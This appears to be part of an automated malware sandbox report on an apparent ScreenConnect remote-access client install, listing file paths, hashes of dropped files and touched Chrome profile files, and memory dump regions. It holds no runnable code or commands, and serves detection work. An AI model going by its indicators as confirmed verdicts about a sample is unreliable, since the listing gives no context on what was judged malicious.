SHA512 1032f433074230784a7ed8de12ce0e5f4e06517a19c657b3cd38ea738abfbf066a73978e80b77b7a106ad363fe0cbb26a9382553893550a0c023e7ded1a69bfe

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485.cdf-ms

MD5 f62b77516ba1315e2d5e1ab5edcb08af
SHA1 feb9177996395e061fcb0e960738526091dec3e0
SHA256 c26c1b6efd7d8ff7e371ce727e59cc739abdc09ba994287e15a287db162692ae
SHA512 cfdf8710d39972bc30a7f4697d141d887481eae172563d402e5a6ff8e6d3a7c29dc7dd070959a616f5150684e182c6b3d8ffcde60147263e52b50d51484af9ee

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c.cdf-ms

MD5 f94c75a7a5ea4352d240523defd7b549
SHA1 dec4d188e589dae89d8e87e8f75475f46c3d9168
SHA256 1c95eeed682be3b0c417766850538fb117fdad4e272a7a7e82cf865e60c31094
SHA512 eccbe30e9438c47fe27bbd07fc6bc1f5ce5e78185df69b1199df6f7dcda34606f5426e7a868ec3b42ef59a655440ae017c47c50e7ad7a2584f50d6350b68e811

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8.cdf-ms

MD5 79c71e928b621f52b3c7c43206867e30
SHA1 19daa5d26a2b6eae08c28f6e8ab223d37087a4e7
SHA256 2bbd931da0aa08aa6be2c0ab0a4075bd0e8773dacca72ecadfe43c43e9451e70
SHA512 60f5048531b66fd48bd30e7178a5efde45c37dc8ce664f355825584803ac03736a851101d1740f218b995fe37c80f17d407e097c38b866f13c50cd8520a177e6

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178.cdf-ms

MD5 4fcd3835c097b762ac0941e52c3dc1e0
SHA1 67b3a7b0186e25a4483a74a325415a56cda22813
SHA256 1945c3458748aec0598a6249c464cea285b250a8f8edb40923620bb03c70008c
SHA512 e72f6daebec0d39a1ae7116647abe9a3bd1d271d4c74a699c8dca3c4d1675cc3c0e535cecb4b8c7226b1f83d5dd4bb1b40a2fbaf94ed433487aeb6218b19cc58

memory/4692-547-0x0000000000CB0000-0x0000000000D40000-memory.dmp

memory/4692-546-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.Windows.dll

MD5 254d64388c6c52228d7a921960a03f6b
SHA1 b023b69348bb06c4b4ad67bee0f55bb9cfb3748c
SHA256 05e78416a344f74095e36ff14baa719867e9e163e1ae9a96c29df8615748b0ae
SHA512 2c52f6627fd1592f7e38b82f3a2d199fbed7b27268d9251b855fe2310d757d7b98db5a0e56956612794d6fce8035d30a6b9cecbd1262c570f0c01430e6e11459

memory/4692-557-0x000000001CDB0000-0x000000001CDC0000-memory.dmp

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\app.config

MD5 21a29ea38f89cedeacddde5f9aecf51b
SHA1 19ca521b899d07bb1e6a44e2efba31d43c49bd45
SHA256 28fd84c9241b3a3545bdab4c57c73b86016db3138da15ac2f596aa613048de92
SHA512 2a12c4ece57544bce8754855f1451f7e5e2c4c7bf0b1bbbef6c290119159fda237773924725d8ebf49b6af0303d0f20b497c71683fc87562d6e9a3b95a79c4c6

memory/5104-577-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/5104-578-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/5104-581-0x0000000000E60000-0x0000000000E74000-memory.dmp

memory/1680-582-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/5104-586-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/5104-585-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/1680-587-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/5104-590-0x0000000004CE0000-0x0000000004D60000-memory.dmp

memory/1680-593-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/4224-604-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4224-606-0x00000000042C0000-0x00000000042D0000-memory.dmp

memory/4224-603-0x00000000044F0000-0x0000000004690000-memory.dmp

memory/1680-607-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/5104-605-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4692-609-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/4224-610-0x0000000004C40000-0x00000000051E4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c27f5aedbf3cab7f3c64f867d4b62795
SHA1 53c6a045153faad3bad8b5933830f2f211ddd397
SHA256 8c5cc45991f65a5f53dc00e82bbe6fe5a01de4734ced01e98cfcf8dfd81616e4
SHA512 e0d270de1d1c85966355b9d05b855c2026b4addac54e94c317023d5cbe1c5836d33c46df546af7883dec8c0bc5b74779fbc5da8095bedc00d5f9a3841ad59130

memory/4224-620-0x0000000004410000-0x0000000004460000-memory.dmp

memory/4224-623-0x0000000004460000-0x0000000004492000-memory.dmp

memory/4224-624-0x0000000004730000-0x00000000047C2000-memory.dmp

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\Client.en-US.resources

MD5 e5d912067630d3efe53f290b9c9d0d27
SHA1 b0fc2105716c6eab770f89b9ed88ce2a36bdb5b2
SHA256 a023527e773b886fb64c5f31de484f659c5816cf4ab696be7c98a3ea4de57d41
SHA512 13fcb0f3f0208c072c86f1df8efe73cfade2803bc4b04e666787a95e10f49289fe6c1b8e10e7dbb5071cae92345fa12139fc220dc23dee4b098cc77fc53a316b

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\Client.Override.en-US.resources

MD5 953c4cbb0ff640008d2402eebf774c6c
SHA1 620c6df6ed6edae888c160b26a4791a91336c27f
SHA256 12191483feb8db21c4b7ecd039be74de31710326b9ff1466d9bd6f53329259f6
SHA512 f992b3b9d284845e1b996d4ae6997834c289471d9ae2b5f912f8bb7d53379b3f3b611a12a1dad66e916b072bc1b6eed3071e109d71e80df190735680c388f61c

memory/1188-629-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1188-631-0x0000000000BD0000-0x0000000000BE4000-memory.dmp

memory/1188-630-0x000000001AFC0000-0x000000001AFD0000-memory.dmp

memory/1052-633-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1052-634-0x0000000000AB0000-0x0000000000AC0000-memory.dmp

memory/1052-635-0x0000000000A70000-0x0000000000A84000-memory.dmp

memory/1052-639-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/4224-640-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4224-641-0x00000000042C0000-0x00000000042D0000-memory.dmp

memory/1188-642-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/4224-643-0x00000000042C0000-0x00000000042D0000-memory.dmp

memory/1188-644-0x000000001AFC0000-0x000000001AFD0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 6cbdb36a2a86b7ad903a296afa1cd820
SHA1 61fac4acec32b16520e5288faae1b2bb8623764e
SHA256 5a26c6182fa43e48c645b76e87ccb9d92f95ddbd3a40b294e1fe2469e65dcf8a
SHA512 37f6ffd59dff0065e6b5e2f01af8a7ab649b7af42279993c071cce36ee259f745f7aeb7d3cd60af459f1967db0797340072bb280b9b03903d09da7913befaff2

memory/1592-657-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1592-658-0x000000001BBF0000-0x000000001BC00000-memory.dmp

memory/4800-661-0x0000000004B90000-0x0000000004BA0000-memory.dmp

memory/4800-662-0x0000000004B90000-0x0000000004BA0000-memory.dmp

memory/4800-660-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4800-663-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/1592-673-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c5e29f99b63ca3c93229c5d37228b003
SHA1 61e838b07ffddc62c988d6ef27c7bfdd6ba7efc0
SHA256 70130367091f4f3d43f1c1f17a7410df238a6f7436cffea31651faff6ac046de
SHA512 131a96b5bd8b8e6e4a81b7b3fe846fcccc2531fe7d010e6702f907485326ec9531ceec6c2ac019b1f966b1f41b620983ebc738ae1d30a510b2f4df90a2e62d60

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 7650aa05cbb3ad4f89c64478aab896bb
SHA1 298547db240c76bb5fa2b9be7725ed585c3281d9
SHA256 cc68a918a4b990ee2c87d768f58b5beda71217ef1b049a008f040a6293e273e8
SHA512 8bd32450dceb97732f9bdf5739f1a45fbecc2841f361d8c3486ca03b86650d03e930c00f208ee5573fe3dbc9fd1a56276d0eca0deba55021e42308881340a3d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9557383c93dc30c12663a49af3cfb0a5
SHA1 62b9388a6cfc979037d8ca8290343a3586ec84a3
SHA256 17a52dd430d621601d6c4f9507e252375408b5d13a1ef5df7dd4efcc52665f73
SHA512 25b4c058def8adca2cff34dda15664c24cda5b39b16eb1e41d6cf4f8ead2b7b42298ab3ba21df5fb85fb70321b2a42a133675d233281c1249ce5a75406b236a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 605e4a94bf4a77ec63b41ee36e6ba0fa
SHA1 2db6811f100eb1a817b55e831e8e5c870bf6ac02
SHA256 b0da46a640a02f69fa40ddd2e14949c35d24e8c82c2f896f9a134021f2761ef7
SHA512 19a0acf3deb7b7cabbe494c30dea8629c0371c557c9a007e285d7afb8de21ed500df3452b386db1ad3cd05df56fee360ee4487bce6142ce953b37d71ca352f55

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 e4cf666539c2c53a74725c5363eab17b
SHA1 502ce31f888879eb812273c46785f08e2f6b51f8
SHA256 2a6291b73b770be267c4b1fafd60bc350310a032b217936698b4455ceaafeefa
SHA512 f781f56a1501c010277d6c3ed0d08ac98ac797255e641102204e37648911762eceab8ffb8a7cedf3d10a2bdc32691840cde624f0f7cb90afc565fc7f5d48d430

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 535179563c3b9a41741178a9996f9221
SHA1 fa607db0401a3f32b395b3d7ffc95b79a24b2308
SHA256 71e2559ebe537ba694e433aa33e2f4e25c097023d1abebe48f71d5463c66654d
SHA512 3ee05087482f3697e1051d2c7409bc2ac49139a2a0be0de3c9ad4cc61f0a20e88cdb29f30f340881c771cb3d5f7151c39d54ea07475d170bc0f6122373786341